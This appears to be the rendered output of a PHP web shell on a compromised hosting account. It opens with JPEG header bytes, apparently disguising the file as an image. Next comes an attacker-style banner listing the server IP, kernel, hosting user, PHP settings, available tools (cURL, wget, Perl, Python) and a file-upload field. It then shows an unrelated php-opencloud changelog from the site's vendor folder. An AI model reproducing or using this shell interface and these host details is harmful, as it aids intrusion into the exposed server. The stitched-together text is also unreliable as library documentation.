����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 3.14.7.99 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/www/vendor/rackspace/php-opencloud/docs/changelog/ |
Upload File : |
## ObjectStore completely refactored All functionality is documented in detail here. If you need a more in-depth look, most of the source code is commented and has docblocks for each method. ## Renamed service methods Factory methods in `OpenCloud\OpenStack` have been upgraded for greater consistency. The full range are: ### OpenStack services - `objectStoreService` - `computeService` - `orchestrationService` - `volumeService` ### Rackspace services - `databaseService` - `loadBalancerService` - `dnsService` - `cloudMonitoringService` - `autoscaleService` - `queuesService` The arguments remain the same ## HTTP stuff - Issuing HTTP requests are now a breeze: you can piggy-back off Guzzle\Http and issue your own requests if you so wish. For a full overview, please see the [official documentation](http://guzzlephp.org). ## Misc changes - URLs are no longer returned as strings, but rather as `Guzzle\Http\Url` objects. To get a string representation, you can cast the object as a string: `(string) $url` - The models of most services have had minor changes to their namespaces - which shouldn't matter if you've used the convenience methods in the past. So a server, for example, is now `OpenCloud\Compute\Resource\Server`.